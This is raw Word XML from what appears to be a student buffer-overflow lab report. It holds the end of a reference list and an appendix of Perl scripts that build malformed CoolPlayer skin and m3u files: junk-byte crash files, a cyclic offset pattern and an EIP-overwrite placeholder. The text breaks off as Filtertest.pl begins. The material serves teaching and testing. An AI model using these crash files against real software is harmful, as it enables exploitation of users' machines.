        <w:t>. [online] Available at: &lt;https://www.cloudflare.com/learning/security/threats/buffer-overflow/&gt; [Accessed 20 April 2021].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFFE7F5" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3945"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ITperfection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Network Security. 2021. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">What is Buffer Overflow? How to Prevent Buffer Overflows? </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ITperfection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. [online] Available at: &lt;https://www.itperfection.com/network-security/buffer-overflow-attack-cybersecurity-network-security-stack-heap-programming-language/&gt; [Accessed 10 May 2021].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="10728AD5" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1544C547" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:rFonts w:eastAsia="F" w:cs="F"/>
          <w:b/>
          <w:bCs/>
          <w:smallCaps/>
          <w:color w:val="000000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A50FB9B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc71564018"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Appendices</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="5FD10F5F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc71564019"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Appendix A – Code Files</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w14:paraId="724793D7" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc71564020"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>Crash.pl</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="3EFF8143" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>my $file= "Crash.ini</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6B0EBF61" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>my $start="[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>CoolPlayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> Skin]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD0D67D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>PlaylistSkin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C142C3" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">my $junk1 = "\x41" x </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>2500;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="062B2C61" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>open($FILE,"&gt;$file"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="41522A54" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>print $FILE $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>start.$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>junk1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082EAEFD" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>close($FILE</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="01FBC48E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="1"/>
        <w:ind w:left="-5" w:right="1119"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B0283F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Ref71474141"/>
      <w:bookmarkStart w:id="83" w:name="_Toc71564021"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>Pattern.pl</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="2B04B642" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>my $file= "Crashpattern.ini</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6ED0C363" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>my $junk1 ="[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>CoolPlayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> Skin]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E49CC2" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>PlaylistSkin=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325E989E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>open($FILE,"&gt;$file"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7211AC94" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>print $FILE $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>junk1;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2B169909" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>close($FILE</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1CF9BE12" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33FD7D2D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Ref71475071"/>
      <w:bookmarkStart w:id="85" w:name="_Toc71564022"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Crashspace.pl</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="1EB7E983" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>my $file= "Crashspace.m3u</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="108608FB" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">my $junk1 = "\x41" x </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1045;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0113361E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>my $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "BBBB</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="590FC176" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>my $junk2="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2C";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7DBE49" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>open($FILE,"&gt;$file"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0EF9C379" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>print $FILE $junk</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1.$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>eip.$junk2;close($FILE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECCC157" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>print "m3u File Created successfully\n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3021EBEA" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc71564023"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>Filtertest.pl</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w14:paraId="20644A86" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>my $file= "Filtertest.ini</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="428BBA57" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>my $start="[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>CoolPlayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Skin]</w:t>
      </w:r>
    </w:p>
